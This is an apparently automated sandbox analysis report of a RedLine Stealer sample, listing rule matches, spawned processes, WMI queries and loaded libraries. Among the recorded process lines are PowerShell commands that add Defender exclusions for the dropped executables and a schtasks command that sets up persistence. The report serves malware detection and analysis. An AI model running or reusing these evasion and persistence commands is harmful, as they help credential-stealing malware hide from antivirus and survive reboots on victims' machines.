                      Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: PO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: AJzHYZtQIb.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, hWGYb7gUweomxbkY6U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, hWGYb7gUweomxbkY6U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: _0020.SetAccessControl
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: _0020.AddAccessRule
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: _0020.SetAccessControl
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: _0020.AddAccessRule
                      Source: 7.2.PO.exe.2a3bdf8.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 7.2.PO.exe.7180000.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 7.2.PO.exe.2a2bde0.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/104@2/1
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00172E6F GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_00172E6F
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00185C5C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00185C5C
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMutant created: \Sessions\1\BaseNamedObjects\KEzgwTXVdrBxFOg
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCommand line argument: sfxname0_2_0018B2FE
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCommand line argument: sfxstime0_2_0018B2FE
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCommand line argument: STARTDLG0_2_0018B2FE
                      Source: w4XFffGDz1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile read: C:\Windows\win.iniJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: PO.exe, 0000000E.00000002.2291165421.0000000006913000.00000004.00000020.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2293576595.0000000007161000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2376563773.0000000006F77000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003362000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, tmp7F89.tmp.21.dr, tmpA0BE.tmp.21.dr, tmpCE16.tmp.14.dr, tmp2BB9.tmp.14.dr, tmpCDF5.tmp.14.dr, tmp2BA8.tmp.14.dr, tmp2BDA.tmp.14.dr, tmp2BD9.tmp.14.dr, tmpD8D8.tmp.21.dr, tmpA0AE.tmp.21.dr, tmpCE06.tmp.14.dr, tmpCE38.tmp.14.dr, tmp7F58.tmp.21.dr, tmp7F78.tmp.21.dr, tmpD909.tmp.21.dr, tmpCE27.tmp.14.dr, tmpD8D7.tmp.21.dr, tmp2BFA.tmp.14.dr, tmp621E.tmp.14.dr, tmp7F8A.tmp.21.dr, tmpB5DE.tmp.21.dr, tmpCE48.tmp.14.dr, tmp7F9B.tmp.21.dr, tmpD8F8.tmp.21.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: w4XFffGDz1.exeReversingLabs: Detection: 68%
                      Source: w4XFffGDz1.exeVirustotal: Detection: 67%
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile read: C:\Users\user\Desktop\w4XFffGDz1.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\w4XFffGDz1.exe "C:\Users\user\Desktop\w4XFffGDz1.exe"
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: twinui.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: mrmcorer.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.staterepositorycore.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: bcp47mrm.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.ui.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windowmanagementapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
